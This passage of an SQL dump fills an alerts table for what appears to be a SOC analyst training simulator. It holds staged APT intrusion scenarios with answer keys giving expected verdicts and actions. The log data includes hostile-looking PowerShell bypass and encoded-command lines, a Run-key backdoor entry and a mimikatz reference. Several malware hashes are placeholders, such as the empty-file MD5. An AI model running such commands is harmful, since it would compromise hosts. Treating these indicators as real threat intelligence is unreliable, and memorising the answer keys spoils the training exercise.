2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.566Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T14:22:35Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Elise\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\Elise\\\\\\\\elise.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Modify\\\",\\\"description\\\":\\\"Registry key modified to run Elise backdoor on startup.\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1233, 'Internal Network Scanning and Lateral Movement - Step 4', 'high', 'Network Traffic Analysis Tools', 'The attacker, leveraging a previously established foothold, conducted an internal network scan targeting 192.168.1.100 and 192.168.1.101. Subsequent attempts to authenticate to these systems were observed, indicating lateral movement attempts. The attacker is suspected to be after sensitive military information.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.123.45.67\",\"internal_scanned_ips\":[\"192.168.1.100\",\"192.168.1.101\"],\"detected_protocol\":\"RDP\",\"attempted_usernames\":[\"admin\",\"mil_user\"],\"malware_hash\":\"a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"filename\":\"malicious_tool.exe\",\"network_tool\":\"Nmap\",\"action\":\"lateral_movement_attempt\"}', '2026-02-07 21:48:01', '2026-02-19 15:48:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"File server\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a tool used by APT for network discovery\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Detected during lateral movement attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1234, 'Data Exfiltration via Encrypted Channels', 'critical', 'Data Loss Prevention (DLP) Systems', 'The Lotus Blossom APT group is suspected of exfiltrating sensitive data from compromised systems using encrypted channels to evade detection. This activity is part of a larger espionage mission targeting intellectual property.', 'Exfiltration', 'T1048.003', 1, 'Closed', 142, '{\"timestamp\":\"2023-10-05T11:32:45Z\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.89\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"exfiltrated_files\":[{\"filename\":\"confidential_report.pdf\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"}],\"action\":\"File transfer\",\"detection_system\":\"DLP\",\"encrypted_channel\":true,\"alert_id\":\"APT-2023-EXFIL-005\"}', '2026-02-07 21:48:01', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Lotus Blossom APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially sensitive document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document identified by DLP.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.568Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T11:32:45Z\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.89\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"action\\\":\\\"File transfer\\\",\\\"detection_system\\\":\\\"DLP\\\",\\\"encrypted_channel\\\":true,\\\"alert_id\\\":\\\"APT-2023-EXFIL-005\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1235, 'Initial Access: Phishing Email with Malicious Attachment', 'high', 'Email server logs', 'A spear-phishing email impersonating a trusted source was detected. The email contained a malicious attachment aimed at gaining initial access to Naikon\'s network. The attack involved delivering a known malicious document associated with Hellsing APT operations.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"sender_email\":\"trusted.source@example.com\",\"recipient_email\":\"j.doe@naikon.com\",\"subject\":\"Urgent: Q3 Report\",\"attachment\":{\"filename\":\"Q3_Report.docx\",\"hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"file_type\":\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\"},\"headers\":{\"received\":\"from mail.example.com (203.0.113.45) by mail.naikon.com\",\"user_agent\":\"Mozilla/5.0\"}}', '2026-02-07 21:48:07', '2026-02-19 15:46:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with previous phishing attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious document used in Hellsing APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Phishing Email with Malicious Attachment\",\"date\":\"2026-02-08T19:00:02.569Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1236, 'Execution: Exploit of Vulnerability in Office Software', 'critical', 'Endpoint protection logs', 'Upon opening the malicious attachment, a zero-day vulnerability in Office software is exploited to deploy Hellsing’s custom malware, executing it within Naikon\'s environment.', 'Vulnerability Exploit', 'T1203: Exploitation for Client Execution', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_type\":\"exploit_attempt\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"vulnerability_id\":\"CVE-2023-1234\",\"malware_name\":\"Hellsing\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_attachment\":\"invoice.docx\",\"process\":\"WINWORD.EXE\",\"destination_file\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\",\"action_taken\":\"blocked\",\"alert_id\":\"1234567890\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Hellsing malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to exploit vulnerability.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the event.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1237, 'Persistence: Establishing Backdoor for Continued Access', 'high', 'Endpoint detection and response (EDR) logs', 'A stealthy backdoor was installed on Naikon\'s network by Hellsing to maintain persistent access, enabling ongoing surveillance and data collection. This step is crucial for the threat actor to ensure long-term access to the compromised systems.', 'Backdoor Installation', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T15:23:45Z\",\"event_id\":\"4624\",\"event_type\":\"Process Creation\",\"computer_name\":\"naikon-host01\",\"user\":\"naikon_user\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\Public\\\\backdoor.ps1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"backdoor.ps1\",\"username\":\"naikon_user\"}', '2026-02-07 21:48:07', '2026-02-19 15:47:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR Logs\",\"verdict\":\"suspicious\",\"details\":\"Script file used for backdoor installation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"naikon_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account accessed.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1238, 'Lateral Movement: Credential Dumping and Privilege Escalation', 'critical', 'Active Directory logs', 'Hellsing adversary used dumped credentials to escalate privileges and move laterally within Naikon\'s network. The attacker accessed sensitive systems by leveraging escalated privileges.', 'Credential Dumping', 'T1003 - Credential Dumping', 1, 'closed', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-12T14:23:45Z\",\"computer_name\":\"naikon-dc01.corp.naikon.local\",\"source_ip\":\"203.0.113.45\",\"source_port\":52874,\"destination_ip\":\"192.168.1.10\",\"destination_port\":389,\"logon_type\":3,\"logon_process_name\":\"Advapi\",\"authentication_package_name\":\"Negotiate\",\"account_name\":\"admin_user\",\"domain_name\":\"NAIKON\",\"logon_guid\":\"{D0F7F5B7-9C89-4EFD-95CB-3D2E3A4A1B1A}\",\"lm_hash\":\"aad3b435b51404eeaad3b435b51404ee\",\"ntlm_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"mimikatz.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Hellsing APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal server hosting Active Directory services.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"Credential used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known Mimikatz executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1239, 'Exfiltration: Data Transfer to External Server', 'critical', 'Network traffic analysis', 'Hellsing initiates data exfiltration, transferring valuable intelligence from Naikon\'s compromised systems to an external server, completing their espionage mission.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-14T03:47:22Z\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"filename\":\"intel_report_2023.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"naikon_user\",\"malware\":\"Hellsing\",\"action\":\"File Transfer\",\"status\":\"Completed\"}', '2026-02-07 21:48:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP from within the compromised network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash linked to Hellsing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"intel_report_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1240, 'Suspicious Email Infiltration Detected', 'high', 'Email Gateway Logs', 'A spear-phishing email was detected targeting key personnel within the military sector, aiming to deliver the initial payload of the Yahoyah malware.', 'Phishing Attack', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T09:15:23Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"from_address\":\"malicious.sender@example.com\",\"to_address\":\"j.doe@military.gov\",\"attachment_name\":\"Security_Update_2023.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"192.168.1.10\",\"malware_detected\":\"Yahoyah\",\"alert_id\":\"email-gw-20231012-001\"}', '2026-02-07 21:48:09', '2026-02-19 12:59:44', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.sender@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Sender associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing servers\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Yahoyah 